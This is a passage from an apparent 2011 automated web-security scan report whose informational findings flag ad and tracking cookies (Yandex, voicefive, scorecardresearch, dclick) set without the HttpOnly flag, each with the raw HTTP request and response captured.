Cookie: uid=uid=888a2c66-6932-11e0-8830-001b24783b20&_hmacv=1&_salt=4113190855&_keyid=k1&_hmac=2bd08a6ff17f1fdebe5379daa4d53c1f64bef7b8; pv1="b!!!!$!#M*E!,Y+@!$Xwq!/h[p!%:3<!!!!$!?5%!(/4f4!w1K*!%4fo!'i8L!'>d6~~~~~<vl)[<wjgu~!#3yC!,Y+@!$Xwq!1`)_!%bq`!!!!$!?5%!$U=A2!w1K*!%4fo!$k7.!'pCX~~~~~<wYiT=#mS_~"; lifb=o1s9XS8(?nv?!8H; ih="b!!!!2!)Tt+!!!!#<wYoD!)`Tm!!!!#<vmX7!)`Tq!!!!#<vmX5!)`U6!!!!#<vmX0!*loT!!!!#<vl)_!/Iw4!!!!#<wF]1!/_KY!!!!#<vl)T!/h[p!!!!#<vl)[!/iq6!!!!$<vmX=!/iq@!!!!$<vm`!!/iqB!!!!#<vmTN!/iqH!!!!#<vmTH!1EYJ!!!!#<wUv<!1M!9!!!!$<wF]9!1`)_!!!!#<wYiT"; bh="b!!!#,!!!?H!!!!%<wR0_!!-G2!!!!$<w[UB!!-yu!!!!.<vm`$!!.+B!!!!.<vm`%!!1Mv!!!!#<waw+!!2(j!!!!/<whqI!!4Qs!!!!%<wle3!!J<=!!!!)<wYiT!!J<E!!!!)<wYiT!!LHY!!!!.<whoV!!L[f!!!!#<wYl+!!ONX!!!!#<wle$!!ObA!!!!$<wav`!!VQ(!!!!#<wYkr!!ita!!!!*<wYiT!!q:E!!!!'<wYiT!!q<+!!!!(<wYiT!!q</!!!!(<wYiT!!q<3!!!!(<wYiT!##^t!!!!#<wYoF!#+<r!!!!#<wO:5!#-H0!!!!#<wleD!#.dO!!!!$<w[_`!#2YX!!!!#<vl)_!#3g6!!!!#<w>/l!#5[N!!!!#<vl)_!#8Mo!!!!#<wle%!#L]q!!!!#<w>/s!#MHv!!!!$<w>/n!#MTK!!!!#<w>/m!#Mr7!!!!#<w>/l!#Qh8!!!!#<w,W$!#RY.!!!!$<w[_`!#SCj!!!!$<w[_`!#SCk!!!!$<w[_`!#SEm!!!!)<wYiT!#SF3!!!!)<wYiT!#UDP!!!!)<wYiT!#U_(!!!!*<wleI!#VEP!!!!#<wleE!#[L>!!!!%<w[UA!#]%`!!!!#<w<@B!#]@s!!!!%<whqH!#]W%!!!!$<w[_`!#^Bo!!!!$<w[_`!#^d6!!!!#<w<@B!#`S2!!!!$<wav`!#a'?!!!!#<w>/m!#aCq!!!!(<w[U@!#aG>!!!!$<w[_`!#aH.!!!!#<w<=N!#b.n!!!!#<w<=N!#c-u!!!!-<w*F]!#e9?!!!!#<wAwk!#eaO!!!!$<w[_`!#g[h!!!!$<w[_`!#mP5!!!!$<w[UB!#mP6!!!!$<w[UB!#p6E!!!!%<wleK!#p6Z!!!!#<wle8!#q),!!!!#<wO:5!#q2T!!!!.<whoV!#q2U!!!!.<whoV!#q9]!!!!#<waw+!#qx3!!!!#<wGkF!#qx4!!!!#<wGk*!#r:A!!!!#<waw,!#uJY!!!!)<wYiT!#ust!!!!$<w[_`!#usu!!!!$<w[_`!#wGj!!!!#<wle$!#wGm!!!!#<wle$!#wW9!!!!$<w[_`!#xI*!!!!$<w[_`!#xIF!!!!%<wYiT!#yM#!!!!$<w[_`!#yX.!!!!9<w*F[!$!>x!!!!*<wjBg!$#WA!!!!$<w[_`!$$K<!!!!$<wleJ!$$L.!!!!#<w[Sh!$$L/!!!!#<w[Sh!$$L0!!!!#<w[Sh!$$LE!!!!#<w[_a!$$LL!!!!$<w[_f!$$p*!!!!#<wUv4!$%,!!!!!$<w[_`!$%SB!!!!$<w[_`!$%Uy!!!!#<w>/l!$%gR!!!!#<w,SV!$(!P!!!!#<wav`!$(+N!!!!#<wGkB!$(Gt!!!!%<wYiT!$(Qs!!!!$<w[_`"; BX=8khj7j56qmjsh&b=4&s=dk&t=106

Response

HTTP/1.1 302 Found
Date: Mon, 25 Apr 2011 14:34:54 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: bh="b!!!#4!!!?H!!!!%<wR0_!!-G2!!!!$<w[UB!!-yu!!!!.<vm`$!!.+B!!!!.<vm`%!!1Mv!!!!#<waw+!!2(j!!!!/<whqI!!4Qs!!!!%<wle3!!J<=!!!!)<wYiT!!J<E!!!!)<wYiT!!LHY!!!!.<whoV!!L[f!!!!#<wYl+!!ONX!!!!#<wle$!!ObA!!!!$<wav`!!VQ(!!!!#<wYkr!!ita!!!!*<wYiT!!q:E!!!!'<wYiT!!q<+!!!!(<wYiT!!q</!!!!(<wYiT!!q<3!!!!(<wYiT!##^t!!!!#<wYoF!#+<r!!!!#<wO:5!#-B#!!!!#<wsc<!#-H0!!!!#<wleD!#.dO!!!!$<w[_`!#2YX!!!!#<vl)_!#3g6!!!!#<w>/l!#3pv!!!!#<wsc<!#5[N!!!!#<vl)_!#8Mo!!!!#<wle%!#L]q!!!!#<w>/s!#MHv!!!!$<w>/n!#MTK!!!!#<w>/m!#Mr7!!!!#<w>/l!#Qh8!!!!#<w,W$!#RY.!!!!$<w[_`!#SCj!!!!$<w[_`!#SCk!!!!$<w[_`!#SEm!!!!)<wYiT!#SF3!!!!)<wYiT!#T,d!!!!#<wsc<!#UDP!!!!)<wYiT!#U_(!!!!*<wleI!#VEP!!!!#<wleE!#[L>!!!!%<w[UA!#]%`!!!!#<w<@B!#]@s!!!!%<whqH!#]W%!!!!$<w[_`!#^Bo!!!!$<w[_`!#^d6!!!!#<w<@B!#`S2!!!!$<wav`!#a'?!!!!#<w>/m!#aCq!!!!(<w[U@!#aG>!!!!$<w[_`!#aH.!!!!#<w<=N!#b.n!!!!#<w<=N!#b@%!!!!#<wsc<!#c-u!!!!-<w*F]!#e9?!!!!#<wAwk!#eaO!!!!$<w[_`!#g[h!!!!$<w[_`!#l)E!!!!#<wsc<!#mP5!!!!$<w[UB!#mP6!!!!$<w[UB!#p6E!!!!%<wleK!#p6Z!!!!#<wle8!#p]R!!!!#<wsc<!#p]T!!!!#<wsc<!#q),!!!!#<wO:5!#q2T!!!!.<whoV!#q2U!!!!.<whoV!#q9]!!!!#<waw+!#qx3!!!!#<wGkF!#qx4!!!!#<wGk*!#r:A!!!!#<waw,!#uJY!!!!)<wYiT!#ust!!!!$<w[_`!#usu!!!!$<w[_`!#w!v!!!!#<wsc<!#wGj!!!!#<wle$!#wGm!!!!#<wle$!#wW9!!!!$<w[_`!#xI*!!!!$<w[_`!#xIF!!!!%<wYiT!#yM#!!!!$<w[_`!#yX.!!!!9<w*F[!$!>x!!!!*<wjBg!$#WA!!!!$<w[_`!$$K<!!!!$<wleJ!$$L.!!!!#<w[Sh!$$L/!!!!#<w[Sh!$$L0!!!!#<w[Sh!$$LE!!!!#<w[_a!$$LL!!!!$<w[_f!$$p*!!!!#<wUv4!$%,!!!!!$<w[_`!$%SB!!!!$<w[_`!$%Uy!!!!#<w>/l!$%gR!!!!#<w,SV!$(!P!!!!#<wav`!$(+N!!!!#<wGkB!$(Gt!!!!%<wYiT!$(Qs!!!!$<w[_`"; path=/; expires=Wed, 24-Apr-2013 14:34:54 GMT
Set-Cookie: BX=8khj7j56qmjsh&b=4&s=dk&t=106; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Location: http://www.googleadservices.com/pagead/conversion/1034849195/?label=2fvbCJuz5gEQq5e67QM&amp;guid=ON&amp;script=0
Cache-Control: no-store
Last-Modified: Mon, 25 Apr 2011 14:34:54 GMT
Pragma: no-cache
Content-Length: 0
Age: 0
Proxy-Connection: close


16.45. http://an.yandex.ru/code/47934  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://an.yandex.ru
Path:   /code/47934

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /code/47934?rnd=33486&direct-limit=9&charset=utf-8&block-origin=2&page-ref=&target-ref=http%3A%2F%2Fwww.trucklist.ru%2Fcars%2Ftrucks%3Futm_source%3Dy_direct%26utm_medium%3Dcpc%26utm_campaign%3Dtruck%26_openstat%3DZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ&grab=dNCh0YDQtdC00L3QuNC1INC4INGC0Y_QttC10LvRi9C1INCz0YDRg9C30L7QstC40LrQuCDQsiDRgNC10LPQuNC-0L3QtSDQktGB0Y8g0KDQvtGB0YHQuNGPIC0g0L7QsdGK0Y_QstC70LXQvdC40Y8g0L3QsCBUcnVja2xpc3QucnUKMdCe0LHRitGP0LLQu9C10L3QuNGPIMK7wqAg0KHRgNC10LTQvdC40LUg0Lgg0YLRj9C20LXQu9GL0LUg0LPRgNGD0LfQvtCy0LjQutC4IAoyCjPQn9GA0LXQvNC40YPQvC3QvtCx0YrRj9Cy0LvQtdC90LjRjyA= HTTP/1.1
Host: an.yandex.ru
Proxy-Connection: keep-alive
Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yandexuid=1981869761303741204; yabs-uvf=0000000000000000

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:43:31 GMT
Server: Phantom/0.0.0
P3P: CP="NOI DEVa TAIa OUR BUS UNI STA"
Last-Modified: Mon, 25 Apr 2011 14:43:31 GMT
Expires: Mon, 25 Apr 2011 14:43:31 GMT
Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Set-Cookie: yabs-uvf=00000FxPbsm00000; domain=an.yandex.ru; path=/; expires=Mon, 02-May-2011 14:43:31 GMT
Content-Length: 6232

var y5_sLinkHead = 'http://an.yandex.ru/count/Jd4i95txsC440000ZhE9MDi4XPwp2vQlAn7HaRXs6q01arIam00000m8VWC0';
var y5_iDirectCounter = 0;
var y5_iDirectAdsCounter = 0;

function yandex_direct_print() {

...[SNIP]...

16.46. http://an.yandex.ru/code/57617  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://an.yandex.ru
Path:   /code/57617

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /code/57617?rnd=29605&direct-limit=9&charset=utf-8&block-origin=2&page-ref=&target-ref=http%3A%2F%2Fwebalta.ru%2Fnews.html&grab=dNCSINCw0LzQtdGA0LjQutCw0L3RgdC60L7QuSDQs9C70YPQsdC40L3QutC1INC90LDRiNC70Lgg0YDQtdC00YfQsNC50YjRg9GOINC40L3QutGD0L3QsNCx0YPQu9GD HTTP/1.1
Host: an.yandex.ru
Proxy-Connection: keep-alive
Referer: http://webalta.ru/news.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yandexuid=1981869761303741204

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:20:09 GMT
Server: Phantom/0.0.0
P3P: CP="NOI DEVa TAIa OUR BUS UNI STA"
Last-Modified: Mon, 25 Apr 2011 14:20:09 GMT
Expires: Mon, 25 Apr 2011 14:20:09 GMT
Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Set-Cookie: yabs-uvf=0000000000000000; domain=an.yandex.ru; path=/; expires=Mon, 02-May-2011 14:20:09 GMT
Content-Length: 6626

var y5_sLinkHead = 'http://an.yandex.ru/count/J9i6sP-l6Xu40000ZhanMDi4XP4H3fQl8qgkaQbw69MJLAJE000030Xz0m00';
var y5_iDirectCounter = 0;
var y5_iDirectAdsCounter = 0;

function yandex_direct_print() {

...[SNIP]...

16.47. http://an.yandex.ru/code/66894  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://an.yandex.ru
Path:   /code/66894

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /code/66894?rnd=928638&direct-limit=9&charset=utf-8&block-origin=2&page-ref=&target-ref=http%3A%2F%2Fpogoda.webalta.ru%2F&grab=dNCf0L7Qs9C-0LTQsCDQvdCwIHdlYmFsdGEucnU= HTTP/1.1
Host: an.yandex.ru
Proxy-Connection: keep-alive
Referer: http://pogoda.webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yandexuid=1981869761303741204; yabs-uvf=0000000000000000

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:20:30 GMT
Server: Phantom/0.0.0
P3P: CP="NOI DEVa TAIa OUR BUS UNI STA"
Last-Modified: Mon, 25 Apr 2011 14:20:30 GMT
Expires: Mon, 25 Apr 2011 14:20:30 GMT
Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Set-Cookie: yabs-uvf=0000000000000000; domain=an.yandex.ru; path=/; expires=Mon, 02-May-2011 14:20:30 GMT
Content-Length: 3561

var y5_sLinkHead = 'http://an.yandex.ru/count/1QrEGmZSpqW40000ZhuoMDi4XPvK49Qke0McaRm8UAa3arIapW0000m8VWC0';
var y5_iDirectCounter = 0;
var y5_iDirectAdsCounter = 0;

function yandex_direct_print() {

...[SNIP]...

16.48. http://ar.voicefive.com/b/wc_beacon.pli  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/wc_beacon.pli

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/wc_beacon.pli?n=BMX_G&d=0&v=method-%3E-1,ts-%3E1303741228.986,wait-%3E10000,&1303741240885 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1134822682510879&output=html&h=600&slotname=3061072279&w=160&lmt=1303759227&flash=10.2.154&url=http%3A%2F%2Fgames.webalta.ru%2F&dt=1303741227549&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303741227571&frm=0&adk=1110337129&ga_vid=973557293.1303741228&ga_sid=1303741228&ga_hid=154889240&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1125&bih=929&fu=0&ifi=1&dtd=35&xpc=naYdoqC7iz&p=http%3A//games.webalta.ru
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p97174789=exp=22&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon Apr 25 14:20:21 2011&prad=253732016&arc=181106347&; BMX_G=method->-1,ts->1303741221; BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:24:25 GMT
Content-Type: image/gif
Connection: close
Vary: Accept-Encoding
Set-Cookie: BMX_G=method%2D%3E%2D1%2Cts%2D%3E1303741228%2E986%2Cwait%2D%3E10000%2C; path=/; domain=.voicefive.com;
Content-length: 42
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent

GIF89a.............!.......,........@..D.;

16.49. http://ar.voicefive.com/bmx3/broker.pli  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253732016&AR_C=181106347 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1134822682510879&output=html&h=600&slotname=3061072279&w=160&lmt=1303759227&flash=10.2.154&url=http%3A%2F%2Fgames.webalta.ru%2F&dt=1303741227549&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303741227571&frm=0&adk=1110337129&ga_vid=973557293.1303741228&ga_sid=1303741228&ga_hid=154889240&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1125&bih=929&fu=0&ifi=1&dtd=35&xpc=naYdoqC7iz&p=http%3A//games.webalta.ru
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p97174789=exp=21&initExp=Sun Apr 24 12:09:48 2011&recExp=Sun Apr 24 16:50:29 2011&prad=253732016&arc=186884742&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:23:23 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=22&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon Apr 25 14:23:23 2011&prad=253732016&arc=181106347&; expires=Sun 24-Jul-2011 14:23:23 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1303741403; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25091

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253732016",Pid:"p97174789",Arc:"181106347",Location:
...[SNIP]...

16.50. http://b.dclick.ru/image.ng/site=mail.ru&adsize=1x1&pos=all.07041160&transactionID=842057554  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.dclick.ru
Path:   /image.ng/site=mail.ru&adsize=1x1&pos=all.07041160&transactionID=842057554

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /image.ng/site=mail.ru&adsize=1x1&pos=all.07041160&transactionID=842057554 HTTP/1.1
Host: b.dclick.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Server: nginx/0.7.67
Date: Mon, 25 Apr 2011 14:20:32 GMT
Content-Type: application/x-netgravity
Connection: close
Set-Cookie: NGUserID=5f831c50-23276-1303741232-1; expires=Wednesday, 30-Dec-2037 16:00:00 GMT; path=/
P3P: policyref="http://front2.imho.ru/w3c/policy.xml", CP="NON CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT DEM LOC"
Pragma: max-age=0
Set-Cookie: NGUserID=5f831c50-23276-1303741232-2; expires=Wednesday, 30-Dec-2037 16:00:00 GMT; path=/
Content-Length: 0
Cache-control: no-cache
Location: http://i.dclick.ru/dot.gif
AdServer: ads1.imho.ru:9678:1
P3P: policyref="http://front2.imho.ru/w3c/policy.xml", CP="NON CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT DEM LOC"
Expires: Mon, 25 Apr 2011 14:20:31 GMT


16.51. http://b.scorecardresearch.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?C1=8&C2=6035824&C3=1271511541440207100&C4=&C5=&C6= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://games.mochiads.com/c/g/moon-volley/mvolley.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Mon, 25 Apr 2011 14:22:00 GMT
Connection: close
Set-Cookie: UID=25894b9d-24.143.206.177-1303083414; expires=Wed, 24-Apr-2013 14:22:00 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


16.52. http://b.scorecardresearch.com/p  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /p

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /p?c1=8&c2=6035179&c3=1&c4=69113&c5=166308&c6=&cv=1.3&cj=1&rn=88302011 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1134822682510879&output=html&h=600&slotname=3061072279&w=160&lmt=1303759227&flash=10.2.154&url=http%3A%2F%2Fgames.webalta.ru%2F&dt=1303741227549&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303741227571&frm=0&adk=1110337129&ga_vid=973557293.1303741228&ga_sid=1303741228&ga_hid=154889240&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1125&bih=929&fu=0&ifi=1&dtd=35&xpc=naYdoqC7iz&p=http%3A//games.webalta.ru
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Mon, 25 Apr 2011 14:20:21 GMT
Connection: close
Set-Cookie: UID=25894b9d-24.143.206.177-1303083414; expires=Wed, 24-Apr-2013 14:20:21 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;

16.53. http://b.voicefive.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.voicefive.com
Path:   /b

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=4&c2=p97174789&c3=253732016&c4=181106347&c5=1&c6=22&c7=sun%20apr%2024%2012%3A09%3A48%202011&c8=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Fpagead%2Fads%3Fclient%3Dca-pub-1134822682510879%26output%3Dhtml%26h%3D600%26slotname%3D3061072279%26w%3D160%26lmt%3D1303759227%26flash%3D10.2.154%26url%3Dhttp%253A%252F%252Fgames.webalta.ru%252F%26dt%3D1303741227549%26bpp%3D5%26shv%3Dr20110420%26jsv%3Dr20110415%26correlator%3D1303741227571%26frm%3D0%26adk%3D1110337129%26ga_vid%3D973557293.1303741228%26ga_sid%3D1303741228%26ga_hid%3D154889240%26ga_fc%3D0%26u_tz%3D-300%26u_his%3D1%26u_java%3D1%26u_h%3D1200%26u_w%3D1920%26u_ah%3D1156%26u_aw%3D1920%26u_cd%3D16%26u_nplug%3D9%26u_nmime%3D44%26biw%3D1125%26bih%3D929%26fu%3D0%26ifi%3D1%26dtd%3D35%26xpc%3DnaYdoqC7iz%26p%3Dhttp%253A%2F%2Fgames.webalta.ru&c9=&c10=&c15=&1303741232904 HTTP/1.1
Host: b.voicefive.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1134822682510879&output=html&h=600&slotname=3061072279&w=160&lmt=1303759227&flash=10.2.154&url=http%3A%2F%2Fgames.webalta.ru%2F&dt=1303741227549&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303741227571&frm=0&adk=1110337129&ga_vid=973557293.1303741228&ga_sid=1303741228&ga_hid=154889240&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1125&bih=929&fu=0&ifi=1&dtd=35&xpc=naYdoqC7iz&p=http%3A//games.webalta.ru
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; UID=875e3f1e-184.84.247.65-1303349046; ar_p97174789=exp=22&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon Apr 25 14:20:21 2011&prad=253732016&arc=181106347&; BMX_G=method->-1,ts->1303741221; BMX_3PC=1

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Mon, 25 Apr 2011 14:23:30 GMT
Connection: close
Set-Cookie: UID=875e3f1e-184.84.247.65-1303349046; expires=Wed, 24-Apr-2013 14:23:30 GMT; path=/; domain=.voicefive.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


